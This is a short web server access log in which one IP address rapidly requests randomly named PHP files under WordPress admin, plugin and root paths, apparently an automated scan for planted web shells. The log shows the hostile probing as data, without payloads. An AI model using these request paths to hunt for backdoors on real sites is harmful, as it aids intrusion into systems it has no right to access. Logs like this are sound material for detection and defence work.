152.42.177.187 - - [31/Mar/2025:04:34:12 -0400] "GET /wp-admin/images/Mhbgf.php HTTP/1.1" 404 15289 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:34:13 -0400] "GET /wp-admin/css/index.php HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:34:14 -0400] "GET /wp-admin/css/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:34:14 -0400] "GET /wp-admin/css/ysirlifn.php HTTP/1.1" 404 15292 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:34:16 -0400] "GET /repeater.php HTTP/1.1" 404 15286 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:34:18 -0400] "GET /wp-content/plugins/linkpreview/db.php?u HTTP/1.1" 404 15305 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:34:20 -0400] "GET /ioxi002.PhP7 HTTP/1.1" 404 15289 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:34:22 -0400] "GET /radio.php HTTP/1.1" 404 15285 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:34:23 -0400] "GET /radio.php HTTP/1.1" 404 15285 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:34:24 -0400] "GET /wp-admin/css/colors/index.php HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
152.42.177.187 - - [31/Mar/2025:04:34:25 -0400] "GET /wp-admin/css/colors/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
